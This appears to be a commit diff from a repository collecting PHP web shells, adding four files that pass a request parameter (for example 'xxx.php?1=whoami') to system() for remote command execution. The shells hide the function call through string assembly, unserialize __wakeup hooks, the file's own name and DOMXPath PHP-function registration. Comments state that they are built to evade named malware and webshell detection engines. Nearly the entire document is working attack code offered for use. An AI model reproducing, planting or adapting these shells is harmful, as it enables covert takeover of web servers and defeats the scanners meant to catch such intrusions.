Create system2022-08-22-4.php

from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1=whoami

php/system2022-08-22-2.php

@@ -0,0 +1,14 @@
+<?php
+//bypass 牧云 and TAV反病毒引擎+洋葱恶意代码检测引擎
+class A{
+    public function __construct(){}
+
+    public function __wakeup(){
+        $b = $_GET[1];
+        $result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
+        $a = join($result);
+        Closure::fromCallable($a)->__invoke($_REQUEST[2]);
+    }
+}
+
+@unserialize('O:1:"A":1:{s:10:" A comment";N;}');

php/system2022-08-22-3.php

@@ -0,0 +1,5 @@
+<?php
+//bypass 牧云 文件名需要设置为system
+$filename=substr(__FILE__,-10,6);
+$command=$_POST[1];
+$filename($command);

php/system2022-08-22-4.php

@@ -0,0 +1,6 @@
+<?php
+//ASRC伏魔引擎bypass
+$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
+$a = join($result);
+array_map($a,(array)$_REQUEST['1']);
+?>

php/system2022-08-22.php

@@ -0,0 +1,24 @@
+<?php
+// dom and xml needed, install php-xml and leave php.ini as default.
+// Author:LemonPrefect
+$cmd = $_GET[3];
+$_REQUEST[1] = "//book[php:functionString('system', '$cmd') = 'PHP']";
+$_REQUEST[2] = ["php", "http://php.net/xpath"];
+$xml = <<< XML
+<?xml version="1.0" encoding="UTF-8"?>
+<books>
+    <book>
+        <title>We are the champions</title>
+        <author>LemonPrefect</author>
+        <author>H3h3QAQ</author>
+    </book>
+</books>
+XML;
+​
+$doc = new DOMDocument;
+$doc->loadXML($xml);
+$clazz = (new ReflectionClass("DOMXPath"));
+$instance = $clazz->newInstance($doc);
+$clazz->getMethod("registerNamespace")->getClosure($instance)->__invoke(...$_REQUEST[2]);
+$clazz->getMethod("registerPHPFunctions")->invoke($instance);
+$clazz->getMethod("query")->getClosure($instance)->__invoke($_REQUEST[1]);